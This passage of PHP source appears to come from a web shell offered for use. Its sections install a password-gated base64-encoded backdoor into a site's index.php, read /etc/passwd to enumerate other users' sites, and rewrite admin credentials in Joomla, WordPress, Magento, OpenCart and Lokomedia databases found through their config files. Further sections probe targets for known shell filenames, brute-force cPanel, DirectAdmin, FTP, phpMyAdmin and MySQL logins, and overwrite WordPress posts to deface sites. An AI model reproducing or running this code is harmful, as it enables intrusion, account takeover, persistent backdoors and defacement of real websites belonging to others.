  3985. if($passwd == '' || !$etc) {
  3986. echo "<font color=red>Can't read /etc/passwd</font>";
  3987. } else {
  3988. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3989. foreach($user_jumping[1] as $user_idx_jump) {
  3990. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  3991. if(is_readable($user_jumping_dir)) {
  3992. $i++;
  3993. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3994. if(is_writable($user_jumping_dir)) {
  3995. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3996. }
  3997. echo $jrw;
  3998. if(function_exists('posix_getpwuid')) {
  3999. $domain_jump = file_get_contents("/etc/named.conf");
  4000. if($domain_jump == '') {
  4001. echo " => ( <font color=red>Cant Resolve its Domain Name!</font> )<br>";
  4002. } else {
  4003. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  4004. foreach($domains_jump[1] as $dj) {
  4005. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  4006. $user_jumping_url = $user_jumping_url['name'];
  4007. if($user_jumping_url == $user_idx_jump) {
  4008. echo " => ( <u>$dj</u> )<br>";
  4009. break;
  4010. }
  4011. }
  4012. }
  4013. } else {
  4014. echo "<br>";
  4015. }
  4016. }
  4017. }
  4018. }
  4019. }
  4020. if($i == 0) {
  4021. } else {
  4022. echo "<br>There are/is ".$i." Website/s on this Webserver: ".gethostbyname($_SERVER['HTTP_HOST']);
  4023. }
  4024. echo "</pre>";
  4025. }
  4026. echo "</div>";
  4027. }elseif($_GET['do'] == 'backdoor'){
  4028. $shell = "ZWNobyAiPHRpdGxlPlNwYWRlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzExMTExMT5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNwYWRlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOzxicj48YSBocmVmPSInLiRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddLiciPj4+OkdvIHRvIHlvdXIgZmlsZTo8PDwvYT4KKTwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7fWVsc2V7ZWNobyAnPGI+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjxjZW50ZXI+VXBsb2FkIGZhaWxlZCA6KDwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7fX1lY2hvICc8Y2VudGVyPjxzcGFuIHN0eWxlPSJmb250LXNpemU6MzBweDsgYmFja2dyb3VuZDogdXJsKCZxdW90O2h0dHA6Ly9zb2xldmlzaWJsZS5jb20vaW1hZ2VzL2JnX2VmZmVjdF91cC5naWYmcXVvdDspIHJlcGVhdC14IHNjcm9sbCAwJSAwJSB0cmFuc3BhcmVudDsgY29sb3I6IGxpbWU7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7CiI+PHN0cm9uZz48Yj48YmlnPjVwNGQzQHByb3Rvbm1haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOw==";
  4029. echo "<center><h1 class=titulo>INSTALL A BACKDOOR</h1><br><p1>Install a backdoor in a file :)</p1><form method=post>Backdoor Loader:: <input type=text name='filename' value='".$dir."/index.php'>Password:: <input type=text name='password' value='azazel'><input type=submit value='Install'></form>";
  4030. if(isset($_POST['filename'])){
  4031. $file = $_POST['filename'];
  4032. $pword = $_POST['password'];
  4033. $code = '<?php error_reporting(0); if(isset($_GET["spade"])){if($_GET["spade"] == "'.$pword.'"){ eval(base64_decode("'.$shell.'"));}}?>';
  4034. if(@is_file($file)&&@is_writable($file)){ $put = @file_put_contents($file, $code."\n".@file_get_contents($file)); if($put){ echo "<br><font color=lime>Run Backdoor:: ".basename($file)."?spade=".$pword."</font>"; }else{ echo "<br><font color=red>Unable to Execute Backdoor!</font>"; }}
  4035. }
  4036. echo "</center>";
  4037. } elseif($_GET['do'] == 'auto_edit_user') {
  4038. if($_POST['hajar']) {
  4039. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  4040. echo "username or password should be more than 6 characters";
  4041. } else {
  4042. $user_baru = $_POST['user_baru'];
  4043. $pass_baru = md5($_POST['pass_baru']);
  4044. $conf = $_POST['config_dir'];
  4045. $scan_conf = scandir($conf);
  4046. foreach($scan_conf as $file_conf) {
  4047. if(!is_file("$conf/$file_conf")) continue;
  4048. $config = file_get_contents("$conf/$file_conf");
  4049. if(preg_match("/JConfig|joomla/",$config)) {
  4050. $dbhost = ambilkata($config,"host = '","'");
  4051. $dbuser = ambilkata($config,"user = '","'");
  4052. $dbpass = ambilkata($config,"password = '","'");
  4053. $dbname = ambilkata($config,"db = '","'");
  4054. $dbprefix = ambilkata($config,"dbprefix = '","'");
  4055. $prefix = $dbprefix."users";
  4056. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4057. $db = mysql_select_db($dbname);
  4058. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4059. $result = mysql_fetch_array($q);
  4060. $id = $result['id'];
  4061. $site = ambilkata($config,"sitename = '","'");
  4062. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  4063. echo "Config => ".$file_conf."<br>";
  4064. echo "CMS => Joomla<br>";
  4065. if($site == '') {
  4066. echo "Sitename => <font color=red>error, could not take his domain name/font><br>";
  4067. } else {
  4068. echo "Sitename => $site<br>";
  4069. }
  4070. if(!$update OR !$conn OR !$db) {
  4071. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4072. } else {
  4073. echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
  4074. }
  4075. mysql_close($conn);
  4076. } elseif(preg_match("/WordPress/",$config)) {
  4077. $dbhost = ambilkata($config,"DB_HOST', '","'");
  4078. $dbuser = ambilkata($config,"DB_USER', '","'");
  4079. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4080. $dbname = ambilkata($config,"DB_NAME', '","'");
  4081. $dbprefix = ambilkata($config,"table_prefix = '","'");
  4082. $prefix = $dbprefix."users";
  4083. $option = $dbprefix."options";
  4084. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4085. $db = mysql_select_db($dbname);
  4086. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4087. $result = mysql_fetch_array($q);
  4088. $id = $result[ID];
  4089. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4090. $result2 = mysql_fetch_array($q2);
  4091. $target = $result2[option_value];
  4092. if($target == '') {
  4093. $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
  4094. } else {
  4095. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  4096. }
  4097. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  4098. echo "Config => ".$file_conf."<br>";
  4099. echo "CMS => Wordpress<br>";
  4100. echo $url_target;
  4101. if(!$update OR !$conn OR !$db) {
  4102. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4103. } else {
  4104. echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
  4105. }
  4106. mysql_close($conn);
  4107. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  4108. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  4109. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  4110. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  4111. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  4112. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  4113. $prefix = $dbprefix."admin_user";
  4114. $option = $dbprefix."core_config_data";
  4115. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4116. $db = mysql_select_db($dbname);
  4117. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  4118. $result = mysql_fetch_array($q);
  4119. $id = $result[user_id];
  4120. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  4121. $result2 = mysql_fetch_array($q2);
  4122. $target = $result2[value];
  4123. if($target == '') {
  4124. $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
  4125. } else {
  4126. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  4127. }
  4128. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  4129. echo "Config => ".$file_conf."<br>";
  4130. echo "CMS => Magento<br>";
  4131. echo $url_target;
  4132. if(!$update OR !$conn OR !$db) {
  4133. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4134. } else {
  4135. echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
  4136. }
  4137. mysql_close($conn);
  4138. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  4139. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  4140. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  4141. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  4142. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  4143. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  4144. $prefix = $dbprefix."user";
  4145. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4146. $db = mysql_select_db($dbname);
  4147. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  4148. $result = mysql_fetch_array($q);
  4149. $id = $result[user_id];
  4150. $target = ambilkata($config,"HTTP_SERVER', '","'");
  4151. if($target == '') {
  4152. $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
  4153. } else {
  4154. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  4155. }
  4156. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  4157. echo "Config => ".$file_conf."<br>";
  4158. echo "CMS => OpenCart<br>";
  4159. echo $url_target;
  4160. if(!$update OR !$conn OR !$db) {
  4161. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4162. } else {
  4163. echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
  4164. }
  4165. mysql_close($conn);
  4166. } elseif(preg_match("/xss validation function call and injection/",$config)) {
  4167. $dbhost = ambilkata($config,'server = "','"');
  4168. $dbuser = ambilkata($config,'username = "','"');
  4169. $dbpass = ambilkata($config,'password = "','"');
  4170. $dbname = ambilkata($config,'database = "','"');
  4171. $prefix = "users";
  4172. $option = "identitas";
  4173. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4174. $db = mysql_select_db($dbname);
  4175. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  4176. $result = mysql_fetch_array($q);
  4177. $target = $result[alamat_website];
  4178. if($target == '') {
  4179. $target2 = $result[url];
  4180. $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
  4181. if($target2 == '') {
  4182. $url_target2 = "Login => <font color=red>error, could not take his domain name</font><br>";
  4183. } else {
  4184. $cek_login3 = file_get_contents("$target2/adminweb/");
  4185. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  4186. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  4187. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  4188. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  4189. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  4190. } else {
  4191. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4192. }
  4193. }
  4194. } else {
  4195. $cek_login = file_get_contents("$target/adminweb/");
  4196. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  4197. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  4198. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  4199. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  4200. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  4201. } else {
  4202. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4203. }
  4204. }
  4205. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  4206. echo "Config => ".$file_conf."<br>";
  4207. echo "CMS => Lokomedia<br>";
  4208. if(preg_match('/error, could not take his domain name/', $url_target)) {
  4209. echo $url_target2;
  4210. } else {
  4211. echo $url_target;
  4212. }
  4213. if(!$update OR !$conn OR !$db) {
  4214. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4215. } else {
  4216. echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
  4217. }
  4218. mysql_close($conn);
  4219. }
  4220. }
  4221. }
  4222. } else {
  4223. echo "<center>
  4224. <h1 class='titulo'>AUTO EDIT USER CONFIG</h1>
  4225. <form method='post'>
  4226. DIR Config: <br>
  4227. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  4228. Set User & Pass: <br>
  4229. <input type='text' name='user_baru' value='Spade' placeholder='user_baru'><br>
  4230. <input type='text' name='pass_baru' value='Spade' placeholder='pass_baru'><br>
  4231. <input type='submit' name='hajar' value='Submit' style='width: 215px;'>
  4232. </form>
  4233. <span>NB: These tools work if run in a folder <u>config</u> ( ex: /home/user/public_html/name_folder_config )</span><br>
  4234. ";
  4235. };
  4236. }elseif($_GET['do'] == 'shelscan') {
  4237. echo'<center><h1 class="titulo">Shell Finder</h1>
  4238. <form action="" method="post">
  4239. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  4240. <br>
  4241. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  4242. </form><br>';
  4243. if (isset($_POST["scan"])) {
  4244. $url = $_POST['traget'];
  4245. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  4246. echo "Result :<br />";
  4247. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  4248. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  4249. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  4250. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  4251. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  4252. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  4253. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  4254. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  4255. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  4256. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  4257. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  4258. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  4259. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  4260. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  4261. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  4262. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  4263. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  4264. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  4265. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  4266. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  4267. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  4268. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  4269. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  4270. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  4271. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  4272. foreach ($shells as $shell){
  4273. $headers = get_headers("$url$shell"); //
  4274. if (eregi('200', $headers[0])) {
  4275. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  4276. $dz = fopen('shells.txt', 'a+');
  4277. $suck = "$url$shell";
  4278. fwrite($dz, $suck."\n");
  4279. }
  4280. }
  4281. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  4282. }
  4283. } elseif($_GET['do'] == 'cpanel') {
  4284. if(strtolower(substr(PHP_OS, 0, 3)) === 'win'){ echo "<center><font color=red>This Feature is Temporarily Blocked on Windows Server :(</font></center>"; }else{
  4285. function Alfa_DirectAdmin_Cracker($info){ if(!$info['mysql']) $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
  4286. else $url = $info['protocol'].$info['target'].'/phpmyadmin';
  4287. $curl = curl_init();
  4288. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  4289. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  4290. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  4291. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  4292. curl_setopt($curl, CURLOPT_HEADER,0);
  4293. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  4294. curl_setopt($curl, CURLOPT_URL,$url);
  4295. curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
  4296. if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  4297. $result = curl_exec($curl);
  4298. $curl_errno = curl_errno($curl);
  4299. $curl_error = curl_error($curl);
  4300. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
  4301. } elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  4302. $info['target'] = $url;
  4303. CrackerResualt($info);
  4304. } curl_close($curl);
  4305. }
  4306. function Alfa_CP_Cracker($info){ $url = $info['protocol'].$info['target'].':'.$info['port'];
  4307. $curl = curl_init();
  4308. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  4309. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  4310. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  4311. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  4312. curl_setopt($curl, CURLOPT_HEADER,0);
  4313. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
  4314. curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
  4315. curl_setopt($curl, CURLOPT_URL, $url);
  4316. $result = curl_exec($curl);
  4317. $curl_errno = curl_errno($curl);
  4318. $curl_error = curl_error($curl);
  4319. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
  4320. } elseif(preg_match('/filemanager/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  4321. $info['target'] = $url;
  4322. CrackerResualt($info);
  4323. } curl_close($curl);
  4324. }
  4325. function Alfa_FTP_Cracker($info){ $url = $info['protocol'].$info['target'];
  4326. $curl = curl_init();
  4327. curl_setopt($curl, CURLOPT_URL, $url);
  4328. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  4329. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  4330. curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
  4331. $result = curl_exec($curl);
  4332. $curl_errno = curl_errno($curl);
  4333. $curl_error = curl_error($curl);
  4334. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
  4335. } elseif(preg_match('/(\d+):(\d+)/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  4336. $info['target'] = $url;
  4337. CrackerResualt($info);
  4338. } curl_close($curl);
  4339. }
  4340. function Alfa_Mysql_Cracker($info){ if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){ CrackerResualt($info);
  4341. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  4342. } }
  4343. function Alfa_FTPC($info){ if($con=@ftp_connect($info['target'],$info['port'])){ if($con){ $login=@ftp_login($con,$info['username'],$info['password']);
  4344. if($login){CrackerResualt($info);
  4345. }}} @ftp_close($con);
  4346. }
  4347. function CrackerResualt($info){ $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
  4348. $c = @fopen($info['fcrack'],'a+');
  4349. @fwrite($c, $res);
  4350. @fclose($c);
  4351. }
  4352. function Alfa_Call_Function_Cracker($method,$info){ switch($method){case 'cp':return Alfa_CP_Cracker($info);
  4353. break;
  4354. case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);
  4355. break;
  4356. case 'ftp':return Alfa_FTP_Cracker($info);
  4357. break;
  4358. case 'mysql':return Alfa_Mysql_Cracker($info);
  4359. break;
  4360. case 'mysql':return Alfa_FTPC($info);
  4361. break;
  4362. } }
  4363.  
  4364. echo "<center><h1 class=titulo>Cracker</h1><br>
  4365. <form method=post> Login Panel:: <select name='loginpanel'>
  4366. <option value='cp'>Cpanel</option>
  4367. <option value='direct'>Direct Admin</option>
  4368. <option value='ftp'>FTP</option>
  4369. <option value='phpmyadmin'>PhpMyAdmin</option>
  4370. <option value='mysql'>mysql_connect()</option>
  4371. <option value='ftpc'>ftp_connect()</option>
  4372. </select> Protocol:: <select name='protocol'>
  4373. <option value='https://'>https://</option>
  4374. <option value='http://'>http://</option>
  4375. <option value='ftp://'>ftp://</option>
  4376. </select> Website/IP Address:: <input type='text' name='target' value='localhost'> Port:: <input type='number' name='port' value='2083'>
  4377. <table width='30%''><td align='center'>Users List</td><td align='center'>Passwords</td></table>
  4378. <textarea placeholder=\"Users\" rows=\"20\" cols=\"25\" name=\"usernames\">".exe("cut -d: -f1 /etc/passwd")."</textarea>
  4379. &nbsp <textarea placeholder=\"Passwords\" rows=\"20\" cols=\"25\" name=\"passwords\"></textarea><br><br>
  4380. Save Result Into File:: <input type=\"text\" name=\"fcrack\" value=\"cracked.txt\"><br>
  4381. <input type=\"submit\" name=\"cracking\" value=\"Crack That Sh!t\" />
  4382. </form>
  4383. ";
  4384. if(isset($_POST['target'])){
  4385. $target = str_replace(array('https://','http://','ftp://'),'',$_POST['target']);
  4386. $port = $_POST['port'];
  4387. $usernames= $_POST['usernames'];
  4388. $passwords = $_POST['passwords'];
  4389. $fcrack = $_POST['fcrack'];
  4390. $cracking = $_POST['cracking'];
  4391. $protocol = $_POST['protocol'];
  4392. $loginpanel = $_POST['loginpanel'];
  4393. $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
  4394. if($cracking=='Crack That Sh!t'){
  4395. $exuser = explode("\n",$usernames);
  4396. $expw = explode("\n",$passwords);
  4397. foreach($exuser as $user){
  4398. foreach($expw as $pw){
  4399. $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
  4400. Alfa_Call_Function_Cracker($loginpanel,$array);
  4401. }
  4402. }
  4403. echo '<br><font color="red">Attack Finished...</font>';
  4404. }
  4405. }
  4406. echo "</center>";}
  4407. }elseif($_GET['do'] == 'auto_wp') {
  4408. if($_POST['hajar']) {
  4409. $title = htmlspecialchars($_POST['new_title']);
  4410. $pn_title = str_replace(" ", "-", $title);
  4411. if($_POST['cek_edit'] == "Y") {
  4412. $script = $_POST['edit_content'];
  4413. } else {
  4414. $script = $title;
  4415. }
  4416. $conf = $_POST['config_dir'];
  4417. $scan_conf = scandir($conf);
  4418. foreach($scan_conf as $file_conf) {
  4419. if(!is_file("$conf/$file_conf")) continue;
  4420. $config = file_get_contents("$conf/$file_conf");
  4421. if(preg_match("/WordPress/", $config)) {
  4422. $dbhost = ambilkata($config,"DB_HOST', '","'");
  4423. $dbuser = ambilkata($config,"DB_USER', '","'");
  4424. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4425. $dbname = ambilkata($config,"DB_NAME', '","'");
  4426. $dbprefix = ambilkata($config,"table_prefix = '","'");
  4427. $prefix = $dbprefix."posts";
  4428. $option = $dbprefix."options";
  4429. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4430. $db = mysql_select_db($dbname);
  4431. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  4432. $result = mysql_fetch_array($q);
  4433. $id = $result[ID];
  4434. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4435. $result2 = mysql_fetch_array($q2);
  4436. $target = $result2[option_value];
  4437. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  4438. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  4439. echo "<div style='margin: 5px auto;'>";
  4440. if($target == '') {
  4441. echo "URL: <font color=red>error, could not take his domain name</font> -> ";
  4442. } else {
  4443. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  4444. }
